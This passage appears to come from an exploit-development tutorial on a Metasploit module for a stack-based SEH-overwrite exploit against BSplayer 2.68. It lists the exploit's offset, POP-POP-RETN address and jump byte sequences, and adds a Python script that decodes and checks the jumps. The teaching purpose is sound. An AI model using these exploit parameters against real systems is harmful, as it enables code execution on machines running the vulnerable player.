Let's look at the following table that highlights all the necessary values and their usage:

| Serial number | Variable | Value |
|---|---|---|
| 1 | Offset value | 2048 |
| 2 | Known location in memory containing POP-POP-RETN series of instructions/P-P-R address | 0x0000583b |
| 3 | Backward jump/long jump to find the shellcode | \xe9\x85\xe9\xff\xff |
| 4 | Short jump/pointer to the next SEH frame | \xeb\xf9\x90\x90 |
We now have all the essentials to build the Metasploit module for the BSplayer 2.68 application. We can see that the author has placed the shellcode precisely after 2048 NOPs. However, this does not mean that the actual offset value is 2048. The author of the exploit has placed it before the SEH overwrite because ...
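To make sense of the two jump values in the table, the following added example (not code from the book or the original exploit) decodes the x86 relative jumps and checks that they chain as the table implies; it assumes the 5-byte long jump sits immediately before the 4-byte next-SEH field.

```python
import struct

# Byte strings from the table above (BSplayer 2.68 SEH overwrite layout).
LONG_JUMP = b"\xe9\x85\xe9\xff\xff"   # jmp rel32 (backward jump to the shellcode)
NEXT_SEH = b"\xeb\xf9\x90\x90"        # jmp short rel8 + two NOP bytes (nSEH field)


def decode_jump(code: bytes):
    """Decode one x86 relative jmp at the start of `code`.

    Returns (mnemonic, length, displacement, target), where `target` is the
    destination as an offset from the start of the instruction itself
    (the CPU adds the displacement to the address of the *next* instruction).
    """
    if code[:1] == b"\xeb":                       # EB rel8
        disp = struct.unpack("<b", code[1:2])[0]
        length, mnemonic = 2, "jmp short"
    elif code[:1] == b"\xe9":                     # E9 rel32
        disp = struct.unpack("<i", code[1:5])[0]
        length, mnemonic = 5, "jmp"
    else:
        raise ValueError("not a relative jmp opcode: %r" % code[:1])
    return mnemonic, length, disp, length + disp


def check_seh_chain(long_jump: bytes, next_seh: bytes):
    """Assumption: `long_jump` is placed directly before the nSEH field.

    Returns (short_lands_on_long, long_dest): whether the short jump in nSEH
    lands exactly on the first byte of the long jump, and where the long jump
    lands relative to the start of nSEH (negative = earlier in the buffer).
    """
    _, _, _, short_target = decode_jump(next_seh)
    _, _, _, long_target = decode_jump(long_jump)
    long_jump_pos = -len(long_jump)               # relative to nSEH start
    short_lands_on_long = short_target == long_jump_pos
    long_dest = long_jump_pos + long_target
    return short_lands_on_long, long_dest


if __name__ == "__main__":
    print(decode_jump(NEXT_SEH))                  # ('jmp short', 2, -7, -5)
    print(decode_jump(LONG_JUMP))                 # ('jmp', 5, -5755, -5750)
    print(check_seh_chain(LONG_JUMP, NEXT_SEH))   # (True, -5755)
```

The short jump backs up exactly 5 bytes, i.e. onto the long jump, which in turn lands 5755 bytes before the nSEH field, well beyond the 2048-byte offset, which is consistent with the point made above.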